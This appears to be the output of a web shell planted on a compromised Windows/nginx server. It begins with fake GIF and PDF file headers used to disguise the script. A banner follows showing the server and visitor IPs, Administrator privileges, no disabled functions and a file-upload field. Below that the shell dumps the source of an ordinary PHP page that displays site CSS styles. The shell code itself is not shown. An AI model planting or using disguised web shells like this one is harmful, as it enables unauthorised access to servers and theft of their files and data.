GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/_work/ |
Upload File : |
<? // css_styles.php // Display site css styles. #$TRACK = false; // Uncomment this line to turn off tracking for this page. // AUTHENTICATION AND TITLE SETTINGS. $authorizedGroups="PUBLIC"; // List of groups authorized to view this page (i.e., PUBLIC = anyone, USER = any user, "Admin,Manager" = users in the Admin or Manager groups). $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. include('application.phpinc'); #d_On(); $headTitle = 'css styles'; $pageTitle = 'css styles'; $js .= ',/_work/css_styles.js'; include('common/pageHeader.phpinc'); $sectionTitle = 'CST.css styles'; include('common/sectionHeader.phpinc'); ?> <div class="left"> <table id="sitecss"> </table> <? $sectionTitle = ''; include('common/sectionFooter.phpinc'); ?> <br> <? $sectionTitle = 'Tooltips'; include('common/sectionHeader.phpinc'); ?> <div class="left"> <table id="acronymtooltip"> <tr><td class="right">acronym styles:</td></tr> <tr><td class="right">tooltip styles:</td></tr> </table> <? include('common/sectionFooter.phpinc'); ?> <br> <? $sectionTitle = 'debug.css styles'; include('common/sectionHeader.phpinc'); ?> <div class="left"> <table id="debugcss" border="1"> </table> <? include('common/sectionFooter.phpinc'); ?> <br> <? $sectionTitle = 'd_Var() debug.css styles'; include('common/sectionHeader.phpinc'); ?> <div class="left"> <? d_On(); d_Var('name hidden n, variable normal (this is the name part)','name hidden n, variable normal (this is the variable part)','n'); d_Var('name normal, variable hidden v (this is the name part)','name normal, variable hidden v (this is the variable part)','v'); d_Var('name error e','variable error E','eE'); d_Var('name warn w','variable warn W','wW'); d_Var('name attention a','variable attention A','aA'); d_Var('name info i','variable info I','iI'); d_Var('name normal','variable normal'); d_Var('name bold b','variable bold B','bB'); d_Off(); ?> </div> <? include('common/sectionFooter.phpinc'); ?> <script type="text/javascript"> if ( siteStylesheet != undefined ) addSiteStyles(); if ( tooltipStylesheet != undefined ) addAcronymStyles(); if ( tooltipStylesheet != undefined ) addTooltipStyles(); if ( debugStylesheet != undefined ) addDebugStyles(); </script> <? include('common/pageFooter.phpinc'); ?>